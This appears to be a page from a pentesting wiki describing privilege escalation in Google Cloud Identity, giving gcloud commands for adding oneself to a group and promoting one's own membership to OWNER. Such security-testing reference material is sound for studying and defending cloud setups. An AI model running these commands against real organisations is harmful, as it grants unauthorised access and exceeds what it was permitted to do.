GCP - Cloudidentity Privesc
{{#include ../../../banners/hacktricks-training.md}}
Cloudidentity
For more information about the cloudidentity service, check this page:
{{#ref}}
../gcp-services/gcp-iam-and-org-policies-enum.md
{{#endref}}
Add yourself to a group
If your user has enough permissions or the group is misconfigured, he might be able to make himself a member of a new group:
Add yourself to a Cloud Identity group
gcloud identity groups memberships add --group-email <email> --member-email <email> [--roles OWNER]
# If --roles isn't specified you will get MEMBER
Modify group membership
If your user has enough permissions or the group is misconfigured, he might be able to make himself OWNER of a group he is a member of:
Modify group membership to become OWNER
# Check the current membership level
gcloud identity groups memberships describe --member-email <email> --group-email <email>
# If not OWNER try
gcloud identity groups memberships modify-membership-roles --group-email <email> --member-email <email> --add-roles=OWNER
{{#include ../../../banners/hacktricks-training.md}}